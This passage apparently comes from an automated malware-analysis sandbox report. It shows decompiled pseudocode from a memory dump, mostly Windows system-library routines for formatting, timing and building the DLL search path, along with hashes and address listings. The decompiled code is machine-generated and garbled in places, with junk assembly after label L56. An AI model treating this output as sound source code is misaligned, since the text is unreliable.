                                          								_t91 = E00E4E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                          								_t115 = _t115 + 0x10;
                                          								_t104 = _t91;
                                          								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                          								__eflags = _t104;
                                          								if(_t104 < 0) {
                                          									L21:
                                          									_t109 = 0x80000005;
                                          									 *(_t114 - 0x90) = 0x80000005;
                                          									L22:
                                          									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                          									L23:
                                          									 *(_t114 - 0x94) = _t109;
                                          									goto L26;
                                          								}
                                          								__eflags = _t104 - _t92;
                                          								if(__eflags > 0) {
                                          									goto L21;
                                          								}
                                          								if(__eflags == 0) {
                                          									goto L22;
                                          								}
                                          								goto L23;
                                          							}
                                          							goto L15;
                                          						}
                                          					}
                                          					__eflags = _t109;
                                          					if(_t109 >= 0) {
                                          						goto L31;
                                          					}
                                          					__eflags = _t109 - 0x80000005;
                                          					if(_t109 != 0x80000005) {
                                          						goto L31;
                                          					}
                                          					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                          					_t38 = _t95 - 1; // -129
                                          					_t99 = _t38;
                                          					goto L34;
                                          				}
                                          				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                          					__eflags = __edx - 0x65;
                                          					if(__edx != 0x65) {
                                          						goto L2;
                                          					}
                                          					goto L6;
                                          				}
                                          				L2:
                                          				_push( *((intOrPtr*)(_t114 + 8)));
                                          				_push(_t106);
                                          				if(E00E4A890() != 0) {
                                          					goto L6;
                                          				}
                                          				goto L3;
                                          			}


                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID: _vswprintf_s
                                          • String ID:
                                          • API String ID: 677850445-0
                                          • Opcode ID: 2aa368c21d9fa48ac6d103b885be369b2239da3b2b6d4f1a2cf025604b0051d5
                                          • Instruction ID: 2227ac96f4a489bc7b8531d97ef22ad6d73581c409accf5e6e644b6988c65d64
                                          • Opcode Fuzzy Hash: 2aa368c21d9fa48ac6d103b885be369b2239da3b2b6d4f1a2cf025604b0051d5
                                          • Instruction Fuzzy Hash: F55101B1D4025A8EDB39CF64D845BAEBBF0BF40754F2051A9E899BB2C2C7704D818B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E00E2B944(signed int* __ecx, char __edx) {
                                          				signed int _v8;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				char _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				signed int _v40;
                                          				intOrPtr _v44;
                                          				signed int* _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				intOrPtr _v60;
                                          				intOrPtr _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				intOrPtr _v76;
                                          				char _v77;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr* _t65;
                                          				intOrPtr _t67;
                                          				intOrPtr _t68;
                                          				char* _t73;
                                          				intOrPtr _t77;
                                          				intOrPtr _t78;
                                          				signed int _t82;
                                          				intOrPtr _t83;
                                          				void* _t87;
                                          				char _t88;
                                          				intOrPtr* _t89;
                                          				intOrPtr _t91;
                                          				void* _t97;
                                          				intOrPtr _t100;
                                          				void* _t102;
                                          				void* _t107;
                                          				signed int _t108;
                                          				intOrPtr* _t112;
                                          				void* _t113;
                                          				intOrPtr* _t114;
                                          				intOrPtr _t115;
                                          				intOrPtr _t116;
                                          				intOrPtr _t117;
                                          				signed int _t118;
                                          				void* _t130;
                                          
                                          				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                          				_v8 =  *0xefd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                          				_t112 = __ecx;
                                          				_v77 = __edx;
                                          				_v48 = __ecx;
                                          				_v28 = 0;
                                          				_t5 = _t112 + 0xc; // 0x575651ff
                                          				_t105 =  *_t5;
                                          				_v20 = 0;
                                          				_v16 = 0;
                                          				if(_t105 == 0) {
                                          					_t50 = _t112 + 4; // 0x5de58b5b
                                          					_t60 =  *__ecx |  *_t50;
                                          					if(( *__ecx |  *_t50) != 0) {
                                          						 *__ecx = 0;
                                          						__ecx[1] = 0;
                                          						if(E00E27D50() != 0) {
                                          							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          						} else {
                                          							_t65 = 0x7ffe0386;
                                          						}
                                          						if( *_t65 != 0) {
                                          							E00ED8CD6(_t112);
                                          						}
                                          						_push(0);
                                          						_t52 = _t112 + 0x10; // 0x778df98b
                                          						_push( *_t52);
                                          						_t60 = E00E49E20();
                                          					}
                                          					L20:
                                          					_pop(_t107);
                                          					_pop(_t113);
                                          					_pop(_t87);
                                          					return E00E4B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                          				}
                                          				_t8 = _t112 + 8; // 0x8b000cc2
                                          				_t67 =  *_t8;
                                          				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                          				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                          				_t108 =  *(_t67 + 0x14);
                                          				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                          				_t105 = 0x2710;
                                          				asm("sbb eax, edi");
                                          				_v44 = _t88;
                                          				_v52 = _t108;
                                          				_t60 = E00E4CE00(_t97, _t68, 0x2710, 0);
                                          				_v56 = _t60;
                                          				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                          					L3:
                                          					 *(_t112 + 0x44) = _t60;
                                          					_t105 = _t60 * 0x2710 >> 0x20;
                                          					 *_t112 = _t88;
                                          					 *(_t112 + 4) = _t108;
                                          					_v20 = _t60 * 0x2710;
                                          					_v16 = _t60 * 0x2710 >> 0x20;
                                          					if(_v77 != 0) {
                                          						L16:
                                          						_v36 = _t88;
                                          						_v32 = _t108;
                                          						if(E00E27D50() != 0) {
                                          							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          						} else {
                                          							_t73 = 0x7ffe0386;
                                          						}
                                          						if( *_t73 != 0) {
                                          							_t105 = _v40;
                                          							E00ED8F6A(_t112, _v40, _t88, _t108);
                                          						}
                                          						_push( &_v28);
                                          						_push(0);
                                          						_push( &_v36);
                                          						_t48 = _t112 + 0x10; // 0x778df98b
                                          						_push( *_t48);
                                          						_t60 = E00E4AF60();
                                          						goto L20;
                                          					} else {
                                          						_t89 = 0x7ffe03b0;
                                          						do {
                                          							_t114 = 0x7ffe0010;
                                          							do {
                                          								_t77 =  *0xef8628; // 0x0
                                          								_v68 = _t77;
                                          								_t78 =  *0xef862c; // 0x0
                                          								_v64 = _t78;
                                          								_v72 =  *_t89;
                                          								_v76 =  *((intOrPtr*)(_t89 + 4));
                                          								while(1) {
                                          									_t105 =  *0x7ffe000c;
                                          									_t100 =  *0x7ffe0008;
                                          									if(_t105 ==  *_t114) {
                                          										goto L8;
                                          									}
                                          									asm("pause");
                                          								}
                                          								L8:
                                          								_t89 = 0x7ffe03b0;
                                          								_t115 =  *0x7ffe03b0;
                                          								_t82 =  *0x7FFE03B4;
                                          								_v60 = _t115;
                                          								_t114 = 0x7ffe0010;
                                          								_v56 = _t82;
                                          							} while (_v72 != _t115 || _v76 != _t82);
                                          							_t83 =  *0xef8628; // 0x0
                                          							_t116 =  *0xef862c; // 0x0
                                          							_v76 = _t116;
                                          							_t117 = _v68;
                                          						} while (_t117 != _t83 || _v64 != _v76);
                                          						asm("sbb edx, [esp+0x24]");
                                          						_t102 = _t100 - _v60 - _t117;
                                          						_t112 = _v48;
                                          						_t91 = _v44;
                                          						asm("sbb edx, eax");
                                          						_t130 = _t105 - _v52;
                                          						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                          							_t88 = _t102 - _t91;
                                          							asm("sbb edx, edi");
                                          							_t108 = _t105;
                                          						} else {
                                          							_t88 = 0;
                                          							_t108 = 0;
                                          						}
                                          						goto L16;
                                          					}
                                          				} else {
                                          					if( *(_t112 + 0x44) == _t60) {
                                          						goto L20;
                                          					}
                                          					goto L3;
                                          				}
                                          			}

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2B9A5
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 885266447-0
                                          • Opcode ID: 457500cdb648856e21f68854cec05baf326f2b73434e8756ce89b96bb351b9cd
                                          • Instruction ID: de82998e85105e7edc2aa8c49b278534b2f90171f6b352366c4a8b1d0c87cda3
                                          • Opcode Fuzzy Hash: 457500cdb648856e21f68854cec05baf326f2b73434e8756ce89b96bb351b9cd
                                          • Instruction Fuzzy Hash: C45159B1A08310CFC720CF29D48092ABBE5FB88714F24996EF695A7355DB31EC44CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 81%
                                          			E00E32581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546911967) {
                                          				signed int _v8;
                                          				signed int _v16;
                                          				unsigned int _v24;
                                          				void* _v28;
                                          				signed int _v32;
                                          				unsigned int _v36;
                                          				signed int _v37;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				intOrPtr _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _t234;
                                          				signed int _t238;
                                          				void* _t239;
                                          				void* _t240;
                                          				signed int _t243;
                                          				signed int _t245;
                                          				intOrPtr _t247;
                                          				signed int _t250;
                                          				signed int _t257;
                                          				signed int _t260;
                                          				signed int _t268;
                                          				signed int _t274;
                                          				signed int _t276;
                                          				void* _t279;
                                          				void* _t282;
                                          				signed int _t283;
                                          				unsigned int _t286;
                                          				signed int _t290;
                                          				void* _t291;
                                          				signed int _t292;
                                          				signed int _t296;
                                          				intOrPtr _t308;
                                          				signed int _t317;
                                          				signed int _t319;
                                          				signed int _t320;
                                          				signed int _t324;
                                          				signed int _t325;
                                          				signed int _t328;
                                          				signed int _t330;
                                          				signed int _t333;
                                          				void* _t334;
                                          				void* _t336;
                                          
                                          				_t330 = _t333;
                                          				_t334 = _t333 - 0x4c;
                                          				_v8 =  *0xefd360 ^ _t330;
                                          				_push(__ebx);
                                          				_push(__esi);
                                          				_push(__edi);
                                          				_t324 = 0xefb2e8;
                                          				_v56 = _a4;
                                          				_v48 = __edx;
                                          				_v60 = __ecx;
                                          				_t286 = 0;
                                          				_v80 = 0;
                                          				asm("movsd");
                                          				_v64 = 0;
                                          				_v76 = 0;
                                          				_v72 = 0;
                                          				asm("movsd");
                                          				_v44 = 0;
                                          				_v52 = 0;
                                          				_v68 = 0;
                                          				asm("movsd");
                                          				_v32 = 0;
                                          				_v36 = 0;
                                          				asm("movsd");
                                          				_v16 = 0;
                                          				_t274 = 0x48;
                                          				_t306 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                          				_t317 = 0;
                                          				_v37 = _t306;
                                          				if(_v48 <= 0) {
                                          					L16:
                                          					_t45 = _t274 - 0x48; // 0x0
                                          					__eflags = _t45 - 0xfffe;
                                          					if(_t45 > 0xfffe) {
                                          						_t325 = 0xc0000106;
                                          						goto L32;
                                          					} else {
                                          						_t324 = L00E24620(_t286,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
                                          						_v52 = _t324;
                                          						__eflags = _t324;
                                          						if(_t324 == 0) {
                                          							_t325 = 0xc0000017;
                                          							goto L32;
                                          						} else {
                                          							 *(_t324 + 0x44) =  *(_t324 + 0x44) & 0x00000000;
                                          							_t50 = _t324 + 0x48; // 0x48
                                          							_t319 = _t50;
                                          							_t306 = _v32;
                                          							 *(_t324 + 0x3c) = _t274;
                                          							_t276 = 0;
                                          							 *((short*)(_t324 + 0x30)) = _v48;
                                          							__eflags = _t306;
                                          							if(_t306 != 0) {
                                          								 *(_t324 + 0x18) = _t319;
                                          								__eflags = _t306 - 0xef8478;
                                          								 *_t324 = ((0 | _t306 == 0x00ef8478) - 0x00000001 & 0xfffffffb) + 7;
                                          								E00E4F3E0(_t319,  *((intOrPtr*)(_t306 + 4)),  *_t306 & 0x0000ffff);
                                          								_t306 = _v32;
                                          								_t334 = _t334 + 0xc;
                                          								_t276 = 1;
                                          								__eflags = _a8;
                                          								_t319 = _t319 + (( *_t306 & 0x0000ffff) >> 1) * 2;
                                          								if(_a8 != 0) {
                                          									_t268 = E00E939F2(_t319);
                                          									_t306 = _v32;
                                          									_t319 = _t268;
                                          								}
                                          							}
                                          							_t290 = 0;
                                          							_v16 = 0;
                                          							__eflags = _v48;
                                          							if(_v48 <= 0) {
                                          								L31:
                                          								_t325 = _v68;
                                          								__eflags = 0;
                                          								 *((short*)(_t319 - 2)) = 0;
                                          								goto L32;
                                          							} else {
                                          								_t274 = _t324 + _t276 * 4;
                                          								_v56 = _t274;
                                          								do {
                                          									__eflags = _t306;
                                          									if(_t306 != 0) {
                                          										_t234 =  *(_v60 + _t290 * 4);
                                          										__eflags = _t234;
                                          										if(_t234 == 0) {
                                          											goto L30;
                                          										} else {
                                          											__eflags = _t234 == 5;
                                          											if(_t234 == 5) {
                                          												goto L30;
                                          											} else {
                                          												goto L22;
                                          											}
                                          										}
                                          									} else {
                                          										L22:
                                          										 *_t274 =  *(_v60 + _t290 * 4);
                                          										 *(_t274 + 0x18) = _t319;
                                          										_t238 =  *(_v60 + _t290 * 4);
                                          										__eflags = _t238 - 8;
                                          										if(_t238 > 8) {
                                          											goto L56;
                                          										} else {
                                          											switch( *((intOrPtr*)(_t238 * 4 +  &M00E32959))) {
                                          												case 0:
                                          													__ax =  *0xef8488;
                                          													__eflags = __ax;
                                          													if(__ax == 0) {
                                          														goto L29;
                                          													} else {
                                          														__ax & 0x0000ffff = E00E4F3E0(__edi,  *0xef848c, __ax & 0x0000ffff);
                                          														__eax =  *0xef8488 & 0x0000ffff;
                                          														goto L26;
                                          													}
                                          													goto L108;
                                          												case 1:
                                          													L45:
                                          													E00E4F3E0(_t319, _v80, _v64);
                                          													_t263 = _v64;
                                          													goto L26;
                                          												case 2:
                                          													 *0xef8480 & 0x0000ffff = E00E4F3E0(__edi,  *0xef8484,  *0xef8480 & 0x0000ffff);
                                          													__eax =  *0xef8480 & 0x0000ffff;
                                          													__eax = ( *0xef8480 & 0x0000ffff) >> 1;
                                          													__edi = __edi + __eax * 2;
                                          													goto L28;
                                          												case 3:
                                          													__eax = _v44;
                                          													__eflags = __eax;
                                          													if(__eax == 0) {
                                          														goto L29;
                                          													} else {
                                          														__esi = __eax + __eax;
                                          														__eax = E00E4F3E0(__edi, _v72, __esi);
                                          														__edi = __edi + __esi;
                                          														__esi = _v52;
                                          														goto L27;
                                          													}
                                          													goto L108;
                                          												case 4:
                                          													_push(0x2e);
                                          													_pop(__eax);
                                          													 *(__esi + 0x44) = __edi;
                                          													 *__edi = __ax;
                                          													__edi = __edi + 4;
                                          													_push(0x3b);
                                          													_pop(__eax);
                                          													 *(__edi - 2) = __ax;
                                          													goto L29;
                                          												case 5:
                                          													__eflags = _v36;
                                          													if(_v36 == 0) {
                                          														goto L45;
                                          													} else {
                                          														E00E4F3E0(_t319, _v76, _v36);
                                          														_t263 = _v36;
                                          													}
                                          													L26:
                                          													_t334 = _t334 + 0xc;
                                          													_t319 = _t319 + (_t263 >> 1) * 2 + 2;
                                          													__eflags = _t319;
                                          													L27:
                                          													_push(0x3b);
                                          													_pop(_t265);
                                          													 *((short*)(_t319 - 2)) = _t265;
                                          													goto L28;
                                          												case 6:
                                          													__ebx =  *0xef575c;
                                          													__eflags = __ebx - 0xef575c;
                                          													if(__ebx != 0xef575c) {
                                          														_push(0x3b);
                                          														_pop(__esi);
                                          														do {
                                          															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                          															E00E4F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                          															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                          															__edi = __edi + __eax * 2;
                                          															__edi = __edi + 2;
                                          															 *(__edi - 2) = __si;
                                          															__ebx =  *__ebx;
                                          															__eflags = __ebx - 0xef575c;
                                          														} while (__ebx != 0xef575c);
                                          														__esi = _v52;
                                          														__ecx = _v16;
                                          														__edx = _v32;
                                          													}
                                          													__ebx = _v56;
                                          													goto L29;
                                          												case 7:
                                          													 *0xef8478 & 0x0000ffff = E00E4F3E0(__edi,  *0xef847c,  *0xef8478 & 0x0000ffff);
                                          													__eax =  *0xef8478 & 0x0000ffff;
                                          													__eax = ( *0xef8478 & 0x0000ffff) >> 1;
                                          													__eflags = _a8;
                                          													__edi = __edi + __eax * 2;
                                          													if(_a8 != 0) {
                                          														__ecx = __edi;
                                          														__eax = E00E939F2(__ecx);
                                          														__edi = __eax;
                                          													}
                                          													goto L28;
                                          												case 8:
                                          													__eax = 0;
                                          													 *(__edi - 2) = __ax;
                                          													 *0xef6e58 & 0x0000ffff = E00E4F3E0(__edi,  *0xef6e5c,  *0xef6e58 & 0x0000ffff);
                                          													 *(__esi + 0x38) = __edi;
                                          													__eax =  *0xef6e58 & 0x0000ffff;
                                          													__eax = ( *0xef6e58 & 0x0000ffff) >> 1;
                                          													__edi = __edi + __eax * 2;
                                          													__edi = __edi + 2;
                                          													L28:
                                          													_t290 = _v16;
                                          													_t306 = _v32;
                                          													L29:
                                          													_t274 = _t274 + 4;
                                          													__eflags = _t274;
                                          													_v56 = _t274;
                                          													goto L30;
                                          											}
                                          										}
                                          									}
                                          									goto L108;
                                          									L30:
                                          									_t290 = _t290 + 1;
                                          									_v16 = _t290;
                                          									__eflags = _t290 - _v48;
                                          								} while (_t290 < _v48);
                                          								goto L31;
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					while(1) {
                                          						L1:
                                          						_t238 =  *(_v60 + _t317 * 4);
                                          						if(_t238 > 8) {
                                          							break;
                                          						}
                                          						switch( *((intOrPtr*)(_t238 * 4 +  &M00E32935))) {
                                          							case 0:
                                          								__ax =  *0xef8488;
                                          								__eflags = __ax;
                                          								if(__ax != 0) {
                                          									__eax = __ax & 0x0000ffff;
                                          									__ebx = __ebx + 2;
                                          									__eflags = __ebx;
                                          									goto L53;
                                          								}
                                          								goto L14;
                                          							case 1:
                                          								L44:
                                          								_t306 =  &_v64;
                                          								_v80 = E00E32E3E(0,  &_v64);
                                          								_t274 = _t274 + _v64 + 2;
                                          								goto L13;
                                          							case 2:
                                          								__eax =  *0xef8480 & 0x0000ffff;
                                          								__ebx = __ebx + __eax;
                                          								__eflags = __dl;
                                          								if(__dl != 0) {
                                          									__eax = 0xef8480;
                                          									goto L80;
                                          								}
                                          								goto L14;
                                          							case 3:
                                          								__eax = E00E1EEF0(0xef79a0);
                                          								__eax =  &_v44;
                                          								_push(__eax);
                                          								_push(0);
                                          								_push(0);
                                          								_push(4);
                                          								_push(L"PATH");
                                          								_push(0);
                                          								L57();
                                          								__esi = __eax;
                                          								_v68 = __esi;
                                          								__eflags = __esi - 0xc0000023;
                                          								if(__esi != 0xc0000023) {
                                          									L10:
                                          									__eax = E00E1EB70(__ecx, 0xef79a0);
                                          									__eflags = __esi - 0xc0000100;
                                          									if(__esi == 0xc0000100) {
                                          										_v44 = _v44 & 0x00000000;
                                          										__eax = 0;
                                          										_v68 = 0;
                                          										goto L13;
                                          									} else {
                                          										__eflags = __esi;
                                          										if(__esi < 0) {
                                          											L32:
                                          											_t212 = _v72;
                                          											__eflags = _t212;
                                          											if(_t212 != 0) {
                                          												L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
                                          											}
                                          											_t213 = _v52;
                                          											__eflags = _t213;
                                          											if(_t213 != 0) {
                                          												__eflags = _t325;
                                          												if(_t325 < 0) {
                                          													L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
                                          													_t213 = 0;
                                          												}
                                          											}
                                          											goto L36;
                                          										} else {
                                          											__eax = _v44;
                                          											__ebx = __ebx + __eax * 2;
                                          											__ebx = __ebx + 2;
                                          											__eflags = __ebx;
                                          											L13:
                                          											_t286 = _v36;
                                          											goto L14;
                                          										}
                                          									}
                                          								} else {
                                          									__eax = _v44;
                                          									__ecx =  *0xef7b9c; // 0x0
                                          									_v44 + _v44 =  *[fs:0x30];
                                          									__ecx = __ecx + 0x180000;
                                          									__eax = L00E24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                          									_v72 = __eax;
                                          									__eflags = __eax;
                                          									if(__eax == 0) {
                                          										__eax = E00E1EB70(__ecx, 0xef79a0);
                                          										__eax = _v52;
                                          										L36:
                                          										_pop(_t318);
                                          										_pop(_t326);
                                          										__eflags = _v8 ^ _t330;
                                          										_pop(_t275);
                                          										return E00E4B640(_t213, _t275, _v8 ^ _t330, _t306, _t318, _t326);
                                          									} else {
                                          										__ecx =  &_v44;
                                          										_push(__ecx);
                                          										_push(_v44);
                                          										_push(__eax);
                                          										_push(4);
                                          										_push(L"PATH");
                                          										_push(0);
                                          										L57();
                                          										__esi = __eax;
                                          										_v68 = __eax;
                                          										goto L10;
                                          									}
                                          								}
                                          								goto L108;
                                          							case 4:
                                          								__ebx = __ebx + 4;
                                          								goto L14;
                                          							case 5:
                                          								_t270 = _v56;
                                          								if(_v56 != 0) {
                                          									_t306 =  &_v36;
                                          									_t272 = E00E32E3E(_t270,  &_v36);
                                          									_t286 = _v36;
                                          									_v76 = _t272;
                                          								}
                                          								if(_t286 == 0) {
                                          									goto L44;
                                          								} else {
                                          									_t274 = _t274 + 2 + _t286;
                                          								}
                                          								goto L14;
                                          							case 6:
                                          								__eax =  *0xef5764 & 0x0000ffff;
                                          								goto L53;
                                          							case 7:
                                          								__eax =  *0xef8478 & 0x0000ffff;
                                          								__ebx = __ebx + __eax;
                                          								__eflags = _a8;
                                          								if(_a8 != 0) {
                                          									__ebx = __ebx + 0x16;
                                          									__ebx = __ebx + __eax;
                                          								}
                                          								__eflags = __dl;
                                          								if(__dl != 0) {
                                          									__eax = 0xef8478;
                                          									L80:
                                          									_v32 = __eax;
                                          								}
                                          								goto L14;
                                          							case 8:
                                          								__eax =  *0xef6e58 & 0x0000ffff;
                                          								__eax = ( *0xef6e58 & 0x0000ffff) + 2;
                                          								L53:
                                          								__ebx = __ebx + __eax;
                                          								L14:
                                          								_t317 = _t317 + 1;
                                          								if(_t317 >= _v48) {
                                          									goto L16;
                                          								} else {
                                          									_t306 = _v37;
                                          									goto L1;
                                          								}
                                          								goto L108;
                                          						}
                                          					}
                                          					L56:
                                          					_t291 = 0x25;
                                          					asm("int 0x29");
                                          					asm("out 0x28, al");
                                          					asm("jecxz 0x2");
                                          					asm("o16 sub bl, ah");
                                          					_t239 = _t238 + _t238;
                                          					asm("daa");
                                          					asm("jecxz 0x2");
                                          					asm("jecxz 0x4");
                                          					_t327 = _t324 + 1;
                                          					 *0x1f00e326 =  *0x1f00e326 + _t239;
                                          					_pop(_t279);
                                          					asm("out 0x0, eax");
                                          					_t240 = _t334;
                                          					_t336 = _t239;
                                          					 *0x200e75b =  *0x200e75b + _t306;
                                          					 *((intOrPtr*)(_t240 - 0x9ff1cd8)) =  *((intOrPtr*)(_t240 - 0x9ff1cd8)) + _t240;
                                          					asm("daa");
                                          					asm("jecxz 0x2");
                                          					_push(ds);
                                          					_t282 = _t279 - _t240 - _t336 - _t240;
                                          					 *((intOrPtr*)(_t324 + 0x29)) =  *((intOrPtr*)(_t324 + 0x29)) + _t291;
                                          					asm("jecxz 0x2");
                                          					asm("daa");
                                          					asm("jecxz 0x2");
                                          					asm("fcomp dword [ebx-0x19]");
                                          					 *((intOrPtr*)(_t240 +  &_a1546911967)) =  *((intOrPtr*)(_t240 +  &_a1546911967)) + _t306;
                                          					asm("out 0x0, eax");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					_push(0x20);
                                          					_push(0xedff00);
                                          					E00E5D08C(_t282, _t319, _t327);
                                          					_v44 =  *[fs:0x18];
                                          					_t320 = 0;
                                          					 *_a24 = 0;
                                          					_t283 = _a12;
                                          					__eflags = _t283;
                                          					if(_t283 == 0) {
                                          						_t243 = 0xc0000100;
                                          					} else {
                                          						_v8 = 0;
                                          						_t328 = 0xc0000100;
                                          						_v52 = 0xc0000100;
                                          						_t245 = 4;
                                          						while(1) {
                                          							_v40 = _t245;
                                          							__eflags = _t245;
                                          							if(_t245 == 0) {
                                          								break;
                                          							}
                                          							_t296 = _t245 * 0xc;
                                          							_v48 = _t296;
                                          							__eflags = _t283 -  *((intOrPtr*)(_t296 + 0xde1664));
                                          							if(__eflags <= 0) {
                                          								if(__eflags == 0) {
                                          									_t260 = E00E4E5C0(_a8,  *((intOrPtr*)(_t296 + 0xde1668)), _t283);
                                          									_t336 = _t336 + 0xc;
                                          									__eflags = _t260;
                                          									if(__eflags == 0) {
                                          										_t328 = E00E851BE(_t283,  *((intOrPtr*)(_v48 + 0xde166c)), _a16, _t320, _t328, __eflags, _a20, _a24);
                                          										_v52 = _t328;
                                          										break;
                                          									} else {
                                          										_t245 = _v40;
                                          										goto L62;
                                          									}
                                          									goto L70;
                                          								} else {
                                          									L62:
                                          									_t245 = _t245 - 1;
                                          									continue;
                                          								}
                                          							}
                                          							break;
                                          						}
                                          						_v32 = _t328;
                                          						__eflags = _t328;
                                          						if(_t328 < 0) {
                                          							__eflags = _t328 - 0xc0000100;
                                          							if(_t328 == 0xc0000100) {
                                          								_t292 = _a4;
                                          								__eflags = _t292;
                                          								if(_t292 != 0) {
                                          									_v36 = _t292;
                                          									__eflags =  *_t292 - _t320;
                                          									if( *_t292 == _t320) {
                                          										_t328 = 0xc0000100;
                                          										goto L76;
                                          									} else {
                                          										_t308 =  *((intOrPtr*)(_v44 + 0x30));
                                          										_t247 =  *((intOrPtr*)(_t308 + 0x10));
                                          										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t292;
                                          										if( *((intOrPtr*)(_t247 + 0x48)) == _t292) {
                                          											__eflags =  *(_t308 + 0x1c);
                                          											if( *(_t308 + 0x1c) == 0) {
                                          												L106:
                                          												_t328 = E00E32AE4( &_v36, _a8, _t283, _a16, _a20, _a24);
                                          												_v32 = _t328;
                                          												__eflags = _t328 - 0xc0000100;
                                          												if(_t328 != 0xc0000100) {
                                          													goto L69;
                                          												} else {
                                          													_t320 = 1;
                                          													_t292 = _v36;
                                          													goto L75;
                                          												}
                                          											} else {
                                          												_t250 = E00E16600( *(_t308 + 0x1c));
                                          												__eflags = _t250;
                                          												if(_t250 != 0) {
                                          													goto L106;
                                          												} else {
                                          													_t292 = _a4;
                                          													goto L75;
                                          												}
                                          											}
                                          										} else {
                                          											L75:
                                          											_t328 = E00E32C50(_t292, _a8, _t283, _a16, _a20, _a24, _t320);
                                          											L76:
                                          											_v32 = _t328;
                                          											goto L69;
                                          										}
                                          									}
                                          									goto L108;
                                          								} else {
                                          									E00E1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          									_v8 = 1;
                                          									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                          									_t328 = _a24;
                                          									_t257 = E00E32AE4( &_v36, _a8, _t283, _a16, _a20, _t328);
                                          									_v32 = _t257;
                                          									__eflags = _t257 - 0xc0000100;
                                          									if(_t257 == 0xc0000100) {
                                          										_v32 = E00E32C50(_v36, _a8, _t283, _a16, _a20, _t328, 1);
                                          									}
                                          									_v8 = _t320;
                                          									E00E32ACB();
                                          								}
                                          							}
                                          						}
                                          						L69:
                                          						_v8 = 0xfffffffe;
                                          						_t243 = _t328;
                                          					}
                                          					L70:
                                          					return E00E5D0D1(_t243);
                                          				}
                                          				L108:
                                          			}
                                          0x00000000
                                          0x00e75bca
                                          0x00e75bca
                                          0x00e75bcd
                                          0x00000000
                                          0x00e75bd3
                                          0x00000000
                                          0x00e75bd3
                                          0x00e75bcd
                                          0x00e3273c
                                          0x00e3273c
                                          0x00e32742
                                          0x00e32747
                                          0x00e3274a
                                          0x00e3274d
                                          0x00e32750
                                          0x00000000
                                          0x00e32756
                                          0x00e32756
                                          0x00000000
                                          0x00e32902
                                          0x00e32908
                                          0x00e3290b
                                          0x00000000
                                          0x00e32911
                                          0x00e3291c
                                          0x00e32921
                                          0x00000000
                                          0x00e32921
                                          0x00000000
                                          0x00000000
                                          0x00e32880
                                          0x00e32887
                                          0x00e3288c
                                          0x00000000
                                          0x00000000
                                          0x00e32805
                                          0x00e3280a
                                          0x00e32814
                                          0x00e32816
                                          0x00000000
                                          0x00000000
                                          0x00e3281e
                                          0x00e32821
                                          0x00e32823
                                          0x00000000
                                          0x00e32829
                                          0x00e32829
                                          0x00e32831
                                          0x00e3283c
                                          0x00e3283e
                                          0x00000000
                                          0x00e3283e
                                          0x00000000
                                          0x00000000
